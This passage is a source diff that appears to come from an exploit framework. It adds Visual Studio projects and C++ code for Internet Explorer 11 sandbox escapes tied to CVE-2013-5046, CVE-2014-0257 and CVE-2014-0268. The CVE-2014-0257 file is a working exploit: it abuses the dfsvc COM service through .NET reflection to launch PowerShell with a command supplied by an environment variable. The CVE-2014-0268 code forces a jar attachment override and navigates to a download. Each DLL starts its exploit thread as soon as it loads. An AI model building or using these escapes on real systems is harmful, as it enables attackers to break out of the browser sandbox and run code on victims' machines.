<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="CVE-2013-5046.cpp" />
<ClCompile Include="dllmain.cpp">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

23
external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp vendored Executable file
View File

@ -0,0 +1,23 @@
// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
DWORD CALLBACK ExploitThread(LPVOID hModule);
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

8
external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp vendored Executable file
View File

@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// CVE-2014-0268.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

12
external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h vendored Executable file
View File

@ -0,0 +1,12 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#include <windows.h>
#include <Utils.h>
#include "interfaces.h"

8
external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h vendored Executable file
View File

@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>

201
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp vendored Executable file
View File

@ -0,0 +1,201 @@
// This file is part of IE11SandboxEsacapes.
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// IE11SandboxEscapes is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
#include "stdafx.h"
#define MAX_ENV 32767
#import <mscorlib.tlb> rename("ReportEvent", "_ReportEvent")
const wchar_t CLSID_DFSVC[] = L"{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}";
long GetSafeArrayLen(LPSAFEARRAY psa)
{
long ubound = 0;
SafeArrayGetUBound(psa, 1, &ubound);
return ubound + 1;
}
mscorlib::_MethodInfoPtr GetStaticMethod(mscorlib::_TypePtr type, LPCWSTR findName, int pcount)
{
LPSAFEARRAY methods = type->GetMethods_2();
mscorlib::_MethodInfoPtr ret;
LONG methodCount = GetSafeArrayLen(methods);
for (long i = 0; i < methodCount; ++i)
{
IUnknown* v = nullptr;
if (SUCCEEDED(SafeArrayGetElement(methods, &i, &v)))
{
mscorlib::_MethodInfoPtr method = v;
bstr_t name = method->Getname();
LPSAFEARRAY params = method->GetParameters();
long paramCount = GetSafeArrayLen(params);
if (method->IsStatic && wcscmp(name.GetBSTR(), findName) == 0 && paramCount == pcount)
{
ret = method;
break;
}
}
}
SafeArrayDestroy(methods);
return ret;
}
template<typename T> T ExecuteMethod(mscorlib::_MethodInfoPtr method, std::vector<variant_t>& args)
{
variant_t obj;
T retObj;
SAFEARRAY * psa;
SAFEARRAYBOUND rgsabound[1];
rgsabound[0].lLbound = 0;
rgsabound[0].cElements = (ULONG)args.size();
psa = SafeArrayCreate(VT_VARIANT, 1, rgsabound);
for (LONG indicies = 0; indicies < (LONG)args.size(); ++indicies)
{
SafeArrayPutElement(psa, &indicies, &args[indicies]);
}
variant_t ret = method->Invoke_3(obj, psa);
if ((ret.vt == VT_UNKNOWN) || (ret.vt == VT_DISPATCH))
{
retObj = ret.punkVal;
}
SafeArrayDestroy(psa);
return retObj;
}
bstr_t GetEnv(LPWSTR env)
{
WCHAR buf[MAX_ENV];
GetEnvironmentVariable(env, buf, MAX_ENV);
return buf;
}
void DoDfsvcExploit()
{
CLSID clsid;
CLSIDFromString(CLSID_DFSVC, &clsid);
DebugPrintf("Starting DFSVC Exploit\n");
mscorlib::_ObjectPtr obj;
HRESULT hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
if (FAILED(hr))
{
WCHAR cmdline[] = L"dfsvc.exe";
STARTUPINFO startInfo = { 0 };
PROCESS_INFORMATION procInfo = { 0 };
// Start dfsvc (because we can due to the ElevationPolicy)
if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline,
nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo))
{
CloseHandle(procInfo.hProcess);
CloseHandle(procInfo.hThread);
// Just sleep to ensure it comes up
Sleep(4000);
hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
}
else
{
DebugPrintf("Couldn't create service %d\n", GetLastError());
}
}
if (SUCCEEDED(hr))
{
try
{
mscorlib::_TypePtr type = obj->GetType();
// Get type of Type (note defaults to RuntimeType then TypeInfo)
type = type->GetType()->BaseType->BaseType;
DebugPrintf("TypeName: %ls", type->FullName.GetBSTR());
mscorlib::_MethodInfoPtr getTypeMethod = GetStaticMethod(type, L"GetType", 1);
DebugPrintf("getTypeMethod: %p", (void*)getTypeMethod);
std::vector<variant_t> getTypeArgs;
getTypeArgs.push_back(L"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
// Get process type
type = ExecuteMethod<mscorlib::_TypePtr>(getTypeMethod, getTypeArgs);
if (type)
{
mscorlib::_MethodInfoPtr startMethod = GetStaticMethod(type, L"Start", 2);
if (startMethod)
{
std::vector<variant_t> startArgs;
startArgs.push_back(L"powershell");
startArgs.push_back(GetEnv(L"PSHCMD"));
ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
}
else
{
DebugPrintf("Couldn't find Start method");
}
}
else
{
DebugPrintf("Couldn't find Process Type");
}
}
catch (_com_error e)
{
DebugPrintf("COM Error: %ls\n", e.ErrorMessage());
}
}
else
{
DebugPrintf("Error get dfsvc IUnknown: %08X\n", hr);
}
}
DWORD CALLBACK ExploitThread(LPVOID hModule)
{
CoInitialize(nullptr);
DoDfsvcExploit();
CoUninitialize();
FreeLibraryAndExitThread((HMODULE)hModule, 0);
}

182
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj vendored Executable file
View File

@ -0,0 +1,182 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{2A46841E-E3FC-42FF-BCDF-70F76E757E26}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>CVE20140268</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="CVE-2014-0257.cpp" />
<ClCompile Include="dllmain.cpp">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

23
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp vendored Executable file
View File

@ -0,0 +1,23 @@
// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
DWORD CALLBACK ExploitThread(LPVOID hModule);
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

8
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp vendored Executable file
View File

@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// CVE-2014-0268.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

11
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h vendored Executable file
View File

@ -0,0 +1,11 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#include <windows.h>
#include <Utils.h>

8
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h vendored Executable file
View File

@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>

81
external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp vendored Executable file
View File

@ -0,0 +1,81 @@
// This file is part of IE11SandboxEsacapes.
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// IE11SandboxEscapes is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
#include "stdafx.h"
#include <Utils.h>
#include <Shlwapi.h>
#include <Exdisp.h>
_COM_SMARTPTR_TYPEDEF(IWebBrowser2, __uuidof(IWebBrowser2));
void DoSetAttachmentUserOverride()
{
IShdocvwBroker* shdocvw = nullptr;
try
{
HRESULT ret;
shdocvw = CreateSHDocVw();
CLSID clsid;
CLSIDFromString(L"{0002DF01-0000-0000-C000-000000000046}", &clsid);
IWebBrowser2Ptr browser;
ret = CoCreateInstance(clsid, nullptr, CLSCTX_SERVER, IID_PPV_ARGS(&browser));
if (FAILED(ret))
{
DebugPrintf("CoCreateInstance: %08X", ret);
throw new _com_error(ret);
}
DebugPrintf("browser: %p", browser);
unsigned char buf[1] = { 0 };
ret = shdocvw->SetAttachmentUserOverride(L"jarfile");
if (FAILED(ret))
{
DebugPrintf("Failed to set attachement user override\n");
throw new _com_error(ret);
}
bstr_t nav = L"http://www.dummy.local/testapp.jar";
DebugPrintf("Navigate: %08X", browser->Navigate(nav, nullptr, nullptr, nullptr, nullptr));
}
catch (_com_error e)
{
DebugPrintf("Error during processing: %ls\n", e.ErrorMessage());
}
if (shdocvw)
{
shdocvw->Release();
shdocvw = nullptr;
}
}
DWORD CALLBACK ExploitThread(LPVOID hModule)
{
CoInitialize(nullptr);
DoSetAttachmentUserOverride();
CoUninitialize();
FreeLibraryAndExitThread((HMODULE)hModule, 0);
return 0;
}

183
external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj vendored Executable file
View File

@ -0,0 +1,183 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>CVE20140268</RootNamespace>
<ProjectName>CVE-2014-0268</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
